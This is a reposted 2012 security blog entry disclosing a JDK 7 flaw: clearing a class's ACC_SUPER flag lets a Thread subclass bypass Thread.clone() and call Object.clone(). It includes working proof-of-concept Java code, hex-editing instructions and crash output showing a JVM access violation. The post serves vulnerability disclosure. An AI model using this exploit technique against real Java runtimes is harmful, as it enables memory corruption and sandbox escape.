Thursday, November 01, 2012

JDK 7 Thread Cloning Vulnerability

This blog entry was originally posted on June 23, 2011, but was deleted as Oracle asked me to take it down while they investigate. After more than a year, the issue still has not been addressed, so I notified Oracle that I wanted to repost the blog entry and received no response. -- Jeroen

I warned on the mailing list when this came up, but apparently was ignored,so maybe a blog post will help.

In one of last year's updates of JDK 6 the cloning vulnerability was fixed in a hackish, but clever and safe way. Now in JDK 7 they try to fix it by overriding Object.clone() with a version that simply throws CloneNotSupportedException. The only problem is, in Java (and .NET too) overriding a method is not a safe way to make the base class method unavailable.

The (still) not so well known ACC_SUPER flag allows you (when it isn't set) to call arbitrary (accessible) methods in your super class hierarchy. So Thread.clone() can be skipped and Object.clone() can be called from any Thread subclass that doesn't have the ACC_SUPER flag set.

Here's an example:

class Clone extends Thread implements Cloneable {
  public Object clone() {
    try { return super.clone(); }
    catch (CloneNotSupportedException _) { throw new Error(); }
  }
}

class Demo {
  public static void main(String[] args) throws Throwable {
    Clone c1 = new Clone() {
      public void run() {
        for (;;) {
        }
      }
    };
    c1.start();
    Thread t = (Thread)c1.clone();
    c1.stop();
    c1.join();
    System.gc();
    t.stop();
  }
}

Note that after you compile this with JDK 6 you'll need to edit the Clone.class to clear the ACC_SUPER flag. Use a hex editor to replace 20 (hex) with 00 or download a copy here.

Now run it:

C:\j>\jdk1.7-b145\bin\java Demo
#
# A fatal error has been detected by the Java Runtime Environment:
#
# EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x000000006cd5af54, pid=3708, t id=10460
#
# JRE version: 7.0-b145
# Java VM: Java HotSpot(TM) 64-Bit Server VM (21.0-b15 mixed mode windows-amd64 compressed oops)
# Problematic frame:
# V [jvm.dll+0x1caf54]
#
# Failed to write core dump. Minidumps are not enabled by default on client versions of Windows
#
# An error report file with more information is saved as:
# C:\j\hs_err_pid3708.log
#
# If you would like to submit a bug report, please visit:
# http://bugreport.sun.com/bugreport/crash.jsp
#

11/1/2012 4:11:20 PM (W. Europe Standard Time, UTC+01:00)  #    Comments [9]